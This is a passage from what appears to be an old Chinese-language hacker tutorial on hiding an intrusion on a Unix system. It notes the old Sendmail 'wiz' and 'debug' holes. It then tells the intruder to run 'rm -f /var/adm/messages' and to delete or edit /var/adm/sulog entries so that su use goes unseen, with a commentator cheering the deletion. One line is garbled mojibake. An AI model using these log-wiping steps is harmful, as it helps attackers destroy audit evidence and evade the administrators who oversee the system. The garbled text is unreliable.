Sendmail早期版本的``wiz''、``debug''命令是漏洞所在,所以***可能会尝试这两个
命令...
因此,/var/adm/messages也是暴露***行踪的隐患,最好把它删掉(如果能的话,哈哈)!
?
# rm -f /var/adm/messages
(samsa:爽!!!)
或者,如果你不想引起注意的话,也可以只把对应的行删掉(当然要有写权限)。
Φ男猩镜簦ǖ比灰?行慈ㄏ蓿??
3.4) sulog
/var/adm下还有一个sulog,是专门为su程序服务的:
# cat sulog
SU 05/06 09:05 + console root-zw
SU 05/06 13:55 - pts/9 yxun-root
SU 05/06 14:03 + pts/9 yxun-root
......
其中``+''表示su成功,``-''表示失败。如果你用过su,那就把这个文件也删掉把,
或者把关于你的行删掉!
